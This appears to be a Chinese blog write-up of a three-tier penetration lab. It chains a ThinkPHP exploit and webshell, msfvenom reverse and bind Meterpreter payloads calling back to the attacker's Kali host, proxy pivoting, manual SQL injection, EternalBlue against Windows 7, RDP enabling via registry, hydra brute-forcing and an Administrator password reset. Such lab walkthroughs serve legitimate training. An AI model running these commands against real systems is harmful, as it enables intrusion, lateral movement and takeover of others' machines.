CFS三层靶机渗透

靶机环境

kali     192.168.1.131
1.CentOs 192.168.1.130    192.168.22.129
2.Ubuntu 192.168.22.128   192.168.33.128
3.Win7   192.168.33.1

账号密码都是root teamssix.com

Target1渗透

信息收集

主机探活

扫描kali同段主机 也就是1段nmap 192.168.1.0/24

image-20221013211100008

找到192.168.1.130,就是靶机1CentOs, 还带出来点端口

直接上80端口看一看 ,v5的ThinkPHP

image-20221013212555036

这直接找个工具梭

getshell

用了个Railgun1的漏扫工具 ,还不错

image-20221013213109467

image-20221013222845334

蚁剑连接成功 getshell, 可以ifconfig

image-20221013223249279

内网渗透

上线msf

1,生成linux木马

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.1.131 LPORT=4444 -f elf>1.elf

image-20221013224851104

2,上传到蚁剑

image-20221013224041671

3,msf开启监听

msfdb run
use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.131
set LPORT 4444
exploit

4,蚁剑运行linux木马 ,msf成功上线

image-20221013225251885

image-20221013225232080

添路由设代理

拿到会话后进行信息收集,获取网络接口

run get_local_subnets

image-20221013225924946

扫到22网段 ,在蚁剑里ifconfig 也是可以知道网段

存在22网段,现在我们是在1网段进行沟通,如何访问到22网段呢,msf和cs都有代理集成功能,我们使用这些功能设置.,先添加路由

run autoroute -s 192.168.22.0/24
run autoroute -p

image-20221013230707910

查看地址解析记录arp -a确定第二层目标为192.168.22.128

arp -a

image-20221014222603174

现在的会话是session1,是建立在Target1的shell上的,建立路由后可以和22网段进行通信。那么我们想要通过session1用工具去攻击22网段,这个时候该怎么办呢?

为了解决这种情况,我们可以在本地(msf上有模块可以开代理)开一个代理,通过这个代理给其他人一个端口去连接,然后我们就可以用自己的本机(自己的电脑,不是攻击机kali)去连接kali的端口,这样就能访问192.168.22.129了

background
use auxiliary/server/socks_proxy
set SRVHOST 0.0.0.0
set SRVPORT 1080
exploit

image-20221013230937220

在linux系统下,可以利用本地的代理接口进行访问

vim /etc/proxychains4.conf

image-20221013231733475

kali的ip和刚才的端口

然后用代理文件进行扫描 22网段

proxychains4 nmap -Pn -sT 192.168.22.128

image-20221013232055903

Target2 渗透

getshell

上面扫出80 端口,直接访问

image-20221013233446310

image-20221013233525848

robots.txt中有入口

image-20221013233714197

主页源码里有hint,那就直接sql注入

sqlmap用代理 连接不稳不能用

手工注入,39个回显点

http://192.168.22.128/index.php?r=vul&keyword=1' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39 --+

剩下就很简单了 拿到用户名密码,密码还要md5解密一下

amdin
46f94c8de14fb36680850768ff1b7f2a  ---> 123qwe

登录进来

在index.php写入马,有好几个index.php 全都写一个

image-20221014000114788

然后测试phpinfo可以

image-20221014000145970

那就直接上蚁剑连,需要代理 用这个工具不错(但是我不上代理好像也连上了。。包括访问80端口)

getshell了,先不管了,继续上线msf

继续设路由继续下一层

继续传马在msf拿shell,不过目标是在192.168.22.0网段,主动连我们肯定是连不上的,所以这里需要正向连,msf去连它

msf生成正向后门

msfvenom -p linux/x64/meterpreter/bind_tcp LPORT=3333 -f elf > 3.elf

msf正向连接

background
use exploit/multi/handler
set payload linux/x64/meterpreter/bind_tcp
set rhost 192.168.22.128
set LPORT 3333
run

执行3.elf

image-20221014002309464

image-20221014002325031

还是老步骤,信息收集+配置访问

获取网络接口:run get_local_subnets
添加路由地址:run autoroute -s 192.168.33.0/24
查看路由地址:run autoroute -p

image-20221014002529481

Target3 渗透

设代理信息收集

然后再重新搞个代理 (我刚开始没重新配代理,用1080那个,但是3389连不上去,重新配了一个倒是成功了

原因不详)

background
use auxiliary/server/socks_proxy
set SRVHOST 0.0.0.0
set SRVPORT 8081
exploit

修改配置文件

vim /etc/proxychains4.conf

image-20221014003131999

尝试扫描33网段

proxychains nmap -Pn -sT 192.168.33.33

image-20221014003451069

发现这是开放着445、3389端口的Windows系统 ,使用永恒之蓝试试

msf打永恒之蓝

background  极其重要
use exploit/windows/smb/ms17_010_psexec
set payload windows/meterpreter/bind_tcp
set RHOST 192.168.33.33
options
run

image-20221014003643824

这个background很重要,我第一次就是因为没这一步而没打通,浪费很多时间找错

拿到会话后随便执行系统命令了,这里shell乱码,可以输入chcp 65001修改编码,就好了

3389远程桌面连接

查看端口

netstat -an

image-20221014003917401

这里3389是打开的

使用meterpreter命令 run getgui -e 开放目标机3389远程桌面端口

开放3389:    meterpreter > run getgui -e
开启远程桌面:meterpreter > run post/windows/manage/enable_rdp

windows打开3389远程连接的命令有两种办法,任选其一:

wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

image-20221014004713617

表示成功

爆破3389用户密码

proxychains hydra  192.168.33.33 rdp -l Administrator -P pass.txt -V

修改用户密码

有权限直接修改密码真爽

net user
net user Administrator 123

image-20221014005316985

xfreerdp工具

命令格式如下:
很容易理解,/u就是用户名,/p是密码,/v是靶机(目标)的地址 /size就是图形化界面的大小而已

proxychains xfreerdp /u:Administrator /p:123 /v:192.168.33.33 /size:80%

rdesktop

命令格式很简单:

proxychains rdesktop 192.168.33.33

image-20221014010027337

远程桌面连接成功,可以随心所欲搞了,留个hack.txt

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值